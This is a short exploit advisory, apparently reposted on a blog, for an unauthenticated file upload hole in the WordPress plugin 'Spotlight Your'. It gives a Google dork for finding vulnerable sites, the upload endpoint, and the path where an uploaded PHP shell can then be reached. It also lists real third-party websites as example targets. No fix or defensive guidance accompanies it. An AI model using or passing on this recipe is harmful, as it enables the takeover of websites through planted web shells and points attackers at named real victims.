Wordpress Plugins Spotlight Your Upload Vulnerability



Exploit Title: Wordpress Plugins Spotlight Your Upload Vulnerability

Google Dork: inurl:"/wp-content/plugins/spotlightyour/"

Date: 18/11/2012

Locations: Banjarmasin, Indonesia

Author: ovanIsmycode & walangkaji

Contact: rootx@thecrowscrew.org & walangkaji@thecrowscrew.org

Software Link: http://www.spotlightyour.com

################################################################################?#################
[+] POC

Exp. Target :

http://domain.com/wp-content/plugins/spotlightyour/

Exploit :
- /monetize/upload/index.php

Shell Access :

http://domain.com/wp-content/uploads/[year]/[month]/[search your shell].php

Examples
http://www.buyusadeals.com/wp-content/pl.../index.php
http://shopping.businessminister.com/wp-...ze/upload/

Share this

Related Posts

Previous
Next Post »